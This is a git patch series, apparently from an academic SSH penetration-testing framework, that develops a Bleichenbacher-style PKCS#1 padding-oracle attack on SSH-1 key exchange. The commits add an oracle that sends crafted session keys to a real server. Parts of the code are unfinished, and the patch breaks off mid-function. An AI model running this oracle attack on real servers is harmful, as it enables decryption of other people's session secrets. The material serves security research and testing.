fingerprint; - if (pair.getFingerPrintTask().isHasError()) { - erroneousScans = true; - LOGGER.warn("Could not extract fingerprint for " + pair); - } else { - fingerprint = pair.getFingerPrintTask().getFingerprint(); - tempResponseVectorList.add(new VectorResponse(pair.getVector(), fingerprint)); - } - } - return tempResponseVectorList; - } - - /** - * This assumes that the responseVectorList only contains comparable vectors - * - * @param responseVectorList Response vectors - * @return Type of EqualityError or EqualityError.NONE if there was none - */ - public EqualityError getEqualityError(List responseVectorList) { - - for (VectorResponse responseOne : responseVectorList) { - for (VectorResponse responseTwo : responseVectorList) { - if (responseOne == responseTwo) { - continue; - } - EqualityError error = - FingerPrintChecker.checkEquality( - responseOne.getFingerprint(), responseTwo.getFingerprint()); - if (error != EqualityError.NONE) { - CONSOLE.info("Found an EqualityError: " + error); - LOGGER.debug("Fingerprint1: " + responseOne.getFingerprint().toString()); - LOGGER.debug("Fingerprint2: " + responseTwo.getFingerprint().toString()); - return error; - } - } - } - return EqualityError.NONE; + return true; } /** @@ -293,42 +142,14 @@ private RSAPublicKey getHostPublicKey() { } private void getPublicKeys() { - List fetchedRsaSsh1Keys = KeyFetcher.fetchRsaSsh1Keys(sshConfig); + List fetchedRsaSsh1Keys = KeyFetcher.fetchRsaSsh1Keys(sshConfig); if (fetchedRsaSsh1Keys.isEmpty()) { LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?"); return; } publicKeys.clear(); publicKeys.addAll(fetchedRsaSsh1Keys); - } - - /** Checks if the server re-uses its RSA transient public key */ - public boolean isTransientKeyReused() { - RSAPublicKey transientKey1 = getServerPublicKey(); - RSAPublicKey transientKey2 = getServerPublicKey(); - if (transientKey1 == null || transientKey2 == null) { - LOGGER.fatal("Could not retrieve server transient public key, is the server running?"); - throw new OracleUnstableException("Fatal Extraction error"); - } else { - return comparePublicKeys(transientKey1, transientKey2); - } - } - - /** Checks if the server re-uses its RSA transient public key */ - private boolean isTransientKeyReused(RSAPublicKey transientKey1) { - RSAPublicKey transientKey2 = getServerPublicKey(); - if (transientKey1 == null || transientKey2 == null) { - LOGGER.fatal("Could not retrieve server transient public key, is the server running?"); - throw new OracleUnstableException("Fatal Extraction error"); - } else { - return comparePublicKeys(transientKey1, transientKey2); - } - } - - /** Compares moduli and public exponents of public keys to check if they are equal */ - private boolean comparePublicKeys(RSAPublicKey transientKey1, RSAPublicKey transientKey2) { - return transientKey1.getPublicExponent().equals(transientKey2.getPublicExponent()) - && transientKey1.getModulus().equals(transientKey2.getModulus()); + LOGGER.info("Recived keys"); } @Override @@ -337,34 +158,43 @@ public void executeAttack() { /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; - } - RSAPublicKey publicKey = getServerPublicKey(); - if (publicKey == null) { + }*/ + // RSAPublicKey publicKey = getServerPublicKey(); + getPublicKeys(); + getHostPublicKey(); + getServerPublicKey(); + /*if (publicKey == null) { LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?"); return; - } + }*/ - if (config.getEncryptedSecret() == null) { + /*if (config.getEncryptedSecret() == null) { throw new ConfigurationException("The encrypted secret must be set to be decrypted."); } if (config.getKexAlgorithm() == null) { throw new ConfigurationException("The key exchange algorithm must be set."); - } + }*/ LOGGER.info( String.format( "Fetched server public key with exponent %s and modulus: %s", - publicKey.getPublicExponent().toString(16), - publicKey.getModulus().toString(16))); + hostPublicKey.getPublicExponent().toString(16), + hostPublicKey.getModulus().toString(16))); byte[] encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); - if ((encryptedSecret.length * Byte.SIZE) != publicKey.getModulus().bitLength()) { + if ((encryptedSecret.length * Byte.SIZE) != hostPublicKey.getModulus().bitLength()) { throw new ConfigurationException( "The length of the encrypted secret " + "is not equal to the public key length. Have you selected the correct value?"); - }*/ + } - byte[] encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); + try { + Thread.sleep(500); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + // byte[] encryptedSecret = + // ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); CustomRsaPrivateKey hostPrivatKey = new CustomRsaPrivateKey( @@ -447,11 +277,18 @@ public void executeAttack() { 16)); try { - Ssh1MockOracle oracle = - new Ssh1MockOracle( - hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey); + /* + Ssh1MockOracle oracle = + new Ssh1MockOracle( + hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey); + */ + + BleichenbacherOracle oracle = + new BleichenbacherOracle( + this.hostPublicKey, this.serverPublicKey, getSshConfig()); Bleichenbacher attacker = - new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); + new Bleichenbacher( + encryptedSecret, oracle, this.hostPublicKey, this.serverPublicKey); attacker.attack(); BigInteger solution = attacker.getSolution(); /* BigInteger secret = @@ -463,12 +300,14 @@ public void executeAttack() { CONSOLE.info("Encoded Solution: " + solution); // CONSOLE.info("Decoded Secret: " + secret); - } catch (NoSuchPaddingException e) { - throw new RuntimeException(e); - } catch (NoSuchAlgorithmException e) { - throw new RuntimeException(e); - } catch (InvalidKeyException e) { - throw new RuntimeException(e); + } /*catch (NoSuchPaddingException e) { + throw new RuntimeException(e); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } catch (InvalidKeyException e) { + throw new RuntimeException(e); + }*/ finally { + } /* RealDirectMessagePkcs1Oracle oracle = diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 6e5d1f0e4..61c7cc649 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -98,6 +98,11 @@ private BigInteger find_smallest_s( BigInteger cipher = new BigInteger(1, ciphertext); BigInteger res = cipher.multiply(exponentiated); BigInteger attempt = res.mod(rsaPublicKey.getModulus()); + try { + Thread.sleep(500); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } boolean oracleResult = queryOracle(attempt, false); if (oracleResult) { diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java new file mode 100644 index 000000000..c30787e03 --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java @@ -0,0 +1,71 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1; + +import de.rub.nds.modifiablevariable.bytearray.ByteArrayModificationFactory; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.constants.RunningModeType; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangePubkeyMessage; +import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; +import de.rub.nds.sshattacker.core.workflow.action.ReceiveAction; +import de.rub.nds.sshattacker.core.workflow.action.SendAction; +import de.rub.nds.sshattacker.core.workflow.action.SendMangerSecretAction; +import de.rub.nds.sshattacker.core.workflow.factory.WorkflowConfigurationFactory; +import de.rub.nds.sshattacker.core.workflow.factory.WorkflowTraceType; + +/** Utility class for generating attack workflows for Manger style attacks */ +public class BleichenbacherWorkflowGenerator { + + /** + * @param sshConfig SSH config to be used to generate the workflow + * @param encryptedSecret Encrypted secret to be set in the key exchange's secret message + * @return A workflow that performs an SSH RSA key exchange up to the secret message + messages + * received after the secret message + */ + public static WorkflowTrace generateWorkflow(Config sshConfig, byte[] encryptedSecret) { + WorkflowTrace trace = + new WorkflowConfigurationFactory(sshConfig) + .createWorkflowTrace( + WorkflowTraceType.KEX_SSH1_ONLY, RunningModeType.CLIENT); + + trace.addSshAction(new ReceiveAction(new ServerPublicKeyMessage())); + + ClientSessionKeyMessage clientSessionKeyMessage = new ClientSessionKeyMessage(); + ModifiableByteArray encryptedSecretArray = new ModifiableByteArray(); + encryptedSecretArray.setModification( + ByteArrayModificationFactory.explicitValue(encryptedSecret)); + clientSessionKeyMessage.setEncryptedSessioKey(encryptedSecretArray); + trace.addSshAction(new SendAction(clientSessionKeyMessage)); + trace.addSshAction(new ReceiveAction()); + return trace; + } + + /** + * Generates a dynamic workflow that encrypts the given encoded secret during execution + * + * @param sshConfig SSH config to be used to generate the workflow + * @param encodedSecret The encoded shared secret to be encrypted and send + * @return A dynamic workflow that performs an SSH RSA key exchange up to the secret message + + * messages received after the secret message + */ + public static WorkflowTrace generateDynamicWorkflow(Config sshConfig, byte[] encodedSecret) { + WorkflowTrace trace = + new WorkflowConfigurationFactory(sshConfig) + .createWorkflowTrace( + WorkflowTraceType.KEX_INIT_ONLY, RunningModeType.CLIENT); + trace.addSshAction(new ReceiveAction(new RsaKeyExchangePubkeyMessage())); + trace.addSshAction(new SendMangerSecretAction(encodedSecret)); + trace.addSshAction(new ReceiveAction()); + return trace; + } + + private BleichenbacherWorkflowGenerator() {} +} diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java new file mode 100644 index 000000000..43300e387 --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -0,0 +1,137 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1.oracles; + +import static de.rub.nds.tlsattacker.util.ConsoleLogger.CONSOLE; + +import de.rub.nds.sshattacker.attacks.pkcs1.BleichenbacherWorkflowGenerator; +import de.rub.nds.sshattacker.attacks.response.ResponseExtractor; +import de.rub.nds.sshattacker.attacks.response.ResponseFingerprint; +import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.state.State; +import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; +import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; +import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; +import de.rub.nds.tlsattacker.util.MathHelper; +import java.io.IOException; +import java.security.interfaces.RSAPublicKey; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** An oracle that communicates with a real server to check PKCS conformity */ +public class BleichenbacherOracle extends Pkcs1Oracle { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final Config config; + + private final RSAPublicKey hostPublicKey; + private final RSAPublicKey serverPublicKey; + + private final int maxAttempts; + + /** + * @param hostPublicKey The public key + * @param config Config + */ + public BleichenbacherOracle( + CustomRsaPublicKey hostPublicKey, CustomRsaPublicKey serverPublicKey, Config config) { + this.hostPublicKey = hostPublicKey; + this.serverPublicKey = serverPublicKey; + this.blockSize = + MathHelper.intCeilDiv(this.hostPublicKey.getModulus().bitLength(), Byte.SIZE); + this.config = config; + this.maxAttempts = 10; + } + + /** + * @param config Config + * @param maxAttempts Number of times the oracle should repeat the query on a workflow exception + */ + public BleichenbacherOracle( + Config config, + CustomRsaPublicKey hostPublicKey, + CustomRsaPublicKey serverPublicKey, + int maxAttempts) { + this.hostPublicKey = hostPublicKey; + this.serverPublicKey = serverPublicKey; + this.blockSize = MathHelper.intCeilDiv(publicKey.getModulus().bitLength(), Byte.SIZE); + this.config = config; + this.maxAttempts = maxAttempts; + } + + @Override + public boolean checkPKCSConformity(final byte[] msg) { + return checkPKCSConformity(msg, 0); + } + + @Override + public boolean[] checkDoublePKCSConformity(final byte[] msg) { + + checkPKCSConformity(msg); + return new boolean[] {false, false}; + } + + private boolean checkPKCSConformity(final byte[] msg, int currentAttempt) { + // we are initializing a new connection in every loop step, since most + // of the known servers close the connection after an invalid handshake + Config sshConfig = config; + sshConfig.setWorkflowExecutorShouldClose(false); + WorkflowTrace trace = BleichenbacherWorkflowGenerator.generateWorkflow(sshConfig, msg); + State state = new State(sshConfig, trace); + WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); + + numberOfQueries++; + if (numberOfQueries % 250 == 0) { + CONSOLE.info("Number of queries so far: {}", numberOfQueries); + } + + boolean conform = false; + try { + workflowExecutor.executeWorkflow(); + if (!trace.executedAsPlanned()) { + // Something did not execute as planned, the result may be either way + throw new WorkflowExecutionException("Workflow did not execute as planned!"); + } + clearConnections(state); + + } catch (WorkflowExecutionException e) { + // If workflow execution failed, retry. This might be because a packet got lost + LOGGER.debug("Exception during workflow execution:" + e.getLocalizedMessage(), e); + if (currentAttempt < maxAttempts) { + return checkPKCSConformity(msg, currentAttempt + 1); + } + } + return conform; + } + + private ResponseFingerprint getFingerprint(State state) { + if (state.getWorkflowTrace().allActionsExecuted()) { + return ResponseExtractor.getFingerprint(state); + } else { + LOGGER.debug( + "Could not execute Workflow. Something went wrong... Check the debug output for more information"); + } + return null; + } + + private void clearConnections(State state) { + try { + state.getSshContext(); + LOGGER.debug("Transporthandler is:"); + LOGGER.debug(state.getSshContext().getTransportHandler().toString()); + if (!state.getSshContext().getTransportHandler().isClosed()) { + state.getSshContext().getTransportHandler().closeConnection(); + } + } catch (IOException ex) { + LOGGER.debug(ex); + } + } +} From ed845e89f45fa133d4eb4a09f07c5da89b3b82b4 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 15 Oct 2023 14:34:51 +0200 Subject: [PATCH 090/176] Fixing Endless Server Mode --- .../nds/sshattacker/core/config/delegate/ServerDelegate.java | 4 ++-- .../java/de/rub/nds/sshattacker/server/main/SshServer.java | 5 ++--- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java index 5ee25c838..806fc1305 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java @@ -55,8 +55,8 @@ public void applyDelegate(Config config) { if (endless) { LOGGER.debug("ENDLESS"); - config.setWorkflowExecutorShouldClose(false); - config.setStopActionsAfterDisconnect(false); + config.setWorkflowExecutorShouldClose(true); + config.setStopActionsAfterDisconnect(true); config.setEndless(true); } } diff --git a/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java b/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java index 0669d4271..e0fcaa309 100644 --- a/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java +++ b/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java @@ -16,7 +16,6 @@ import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; import de.rub.nds.sshattacker.server.config.ServerCommandConfig; -import java.io.IOException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -65,12 +64,12 @@ public void startSshServer(Config config) { LOGGER.debug(e.getLocalizedMessage(), e); } - try { + /* try { if (!state.getSshContext().getTransportHandler().isClosed()) { state.getSshContext().getTransportHandler().closeConnection(); } } catch (IOException e) { throw new RuntimeException(e); - } + }*/ } } From 6fea461240aac915a309da145d9e16406b2b5f16 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 22 Oct 2023 21:43:18 +0200 Subject: [PATCH 091/176] Fixing Failure Message --- .../core/protocol/ssh1/handler/FailureMessageHandler.java | 3 +-- .../core/protocol/ssh1/message/FailureMessageSSH1.java | 5 ----- .../core/protocol/ssh1/parser/FailureMessageParser.java | 4 +--- .../protocol/ssh1/preparator/FailureMessagePreparator.java | 1 - .../protocol/ssh1/serializer/FailureMessageSerializier.java | 1 - 5 files changed, 2 insertions(+), 12 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/FailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/FailureMessageHandler.java index 3517d9ece..358ff9f21 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/FailureMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/FailureMessageHandler.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,6 +23,6 @@ public FailureMessageHandler(SshContext context) { @Override public void adjustContext(FailureMessageSSH1 message) { - LOGGER.info("Received a Success Message"); + LOGGER.info("Received a Failure Message"); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/FailureMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/FailureMessageSSH1.java index bec839d48..8053179aa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/FailureMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/FailureMessageSSH1.java @@ -13,14 +13,9 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.FailureMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.SuccessMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.FailureMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.SuccessMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.FailureMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.SuccessMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.FailureMessageSerializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.SuccessMessageSerializier; - import java.io.InputStream; public class FailureMessageSSH1 extends SshMessage { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/FailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/FailureMessageParser.java index 1cd04873d..5bdeac26c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/FailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/FailureMessageParser.java @@ -10,12 +10,10 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class FailureMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/FailureMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/FailureMessagePreparator.java index 6e6a176df..59dc433f7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/FailureMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/FailureMessagePreparator.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/FailureMessageSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/FailureMessageSerializier.java index 6e7150d80..d6fd69f61 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/FailureMessageSerializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/FailureMessageSerializier.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; From 7a4b7d2081133d7a30c8f59e20e0e58bc07d9fa8 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 22 Oct 2023 21:43:52 +0200 Subject: [PATCH 092/176] Correcting Disconnect Message --- .../de/rub/nds/sshattacker/attacks/general/KeyFetcher.java | 4 ++++ .../core/protocol/ssh1/message/DisconnectMessageSSH1.java | 2 +- .../protocol/ssh1/preparator/DisconnectMessagePreparator.java | 4 +++- 3 files changed, 8 insertions(+), 2 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java index 6177d3f4d..0816c5aca 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java @@ -7,6 +7,8 @@ */ package de.rub.nds.sshattacker.attacks.general; +import de.rub.nds.modifiablevariable.VariableModification; +import de.rub.nds.modifiablevariable.string.StringModificationFactory; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.constants.ProtocolVersion; @@ -180,6 +182,8 @@ public static List fetchRsaSsh1Keys( DisconnectMessageSSH1 disconnectMessage = new DisconnectMessageSSH1(); disconnectMessage.setDisconnectReason("cusIcan"); + VariableModification newValue = StringModificationFactory.explicitValue("youKnow"); + disconnectMessage.getDisconnectReason().setModification(newValue); LOGGER.debug(disconnectMessage.getDisconnectReason()); LOGGER.debug(disconnectMessage.toShortString()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessageSSH1.java index b7a6a2795..5e6c9fd14 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessageSSH1.java @@ -60,6 +60,6 @@ public SshMessageSerializer getSerializer(SshContext cont @Override public String toShortString() { - return "SSH_DISCONNECT"; + return "Disconnect Message"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java index 1013d5fa9..ad7e78f5c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java @@ -30,7 +30,9 @@ public DisconnectMessagePreparator(Chooser chooser, DisconnectMessageSSH1 messag @Override public void prepareMessageSpecificContents() { LOGGER.debug("Preparring now..."); - getObject().setDisconnectReason("DummyValue"); + if (getObject().getDisconnectReason() == null) { + getObject().setDisconnectReason("DummyValue"); + } LOGGER.debug(getObject().getDisconnectReason().getValue()); } } From 10885301ce6ee4106befb5c155a2948c58beb1c2 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 22 Oct 2023 21:45:47 +0200 Subject: [PATCH 093/176] Adding Oracle-Features and a dedicated oracle action, --- .../config/BleichenbacherCommandConfig.java | 3 + .../BleichenbacherWorkflowGenerator.java | 2 +- .../pkcs1/oracles/BleichenbacherOracle.java | 43 ++++++- .../nds/sshattacker/core/config/Config.java | 12 +- .../core/crypto/cipher/RsaPkcs1Cipher.java | 7 +- .../sshattacker/core/layer/ProtocolLayer.java | 7 +- .../core/layer/context/SshContext.java | 10 ++ .../ClientSessionKeyMessageHandler.java | 40 ++++++- .../core/workflow/WorkflowTrace.java | 6 +- .../action/SendBleichenbacherOracleReply.java | 108 ++++++++++++++++++ 10 files changed, 225 insertions(+), 13 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendBleichenbacherOracleReply.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index 4369e630d..0597d6598 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -64,6 +64,9 @@ public Config createConfig() { config.setProtocolVersion(ProtocolVersion.SSH1); config.setDefaultLayerConfiguration(LayerConfiguration.SSHV1); config.setClientVersion("SSH-1.7-OpenSSH_6.2p1"); + config.setDoNotEncryptMessages(true); + config.setStopActionsAfterDisconnect(false); + config.setStopReceivingAfterDisconnect(false); return config; } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java index c30787e03..bcc90ee1d 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java @@ -44,7 +44,7 @@ public static WorkflowTrace generateWorkflow(Config sshConfig, byte[] encryptedS ByteArrayModificationFactory.explicitValue(encryptedSecret)); clientSessionKeyMessage.setEncryptedSessioKey(encryptedSecretArray); trace.addSshAction(new SendAction(clientSessionKeyMessage)); - trace.addSshAction(new ReceiveAction()); + return trace; } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java index 43300e387..98da96de1 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -15,10 +15,15 @@ import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; +import de.rub.nds.sshattacker.core.workflow.action.GenericReceiveAction; import de.rub.nds.tlsattacker.util.MathHelper; import java.io.IOException; import java.security.interfaces.RSAPublicKey; @@ -37,6 +42,8 @@ public class BleichenbacherOracle extends Pkcs1Oracle { private final int maxAttempts; + private int counter; + /** * @param hostPublicKey The public key * @param config Config @@ -49,6 +56,7 @@ public BleichenbacherOracle( MathHelper.intCeilDiv(this.hostPublicKey.getModulus().bitLength(), Byte.SIZE); this.config = config; this.maxAttempts = 10; + counter = 0; } /** @@ -69,22 +77,25 @@ public BleichenbacherOracle( @Override public boolean checkPKCSConformity(final byte[] msg) { - return checkPKCSConformity(msg, 0); + return checkPKCSConformity(msg, 0)[0]; } @Override public boolean[] checkDoublePKCSConformity(final byte[] msg) { - checkPKCSConformity(msg); - return new boolean[] {false, false}; + return checkPKCSConformity(msg, 0); } - private boolean 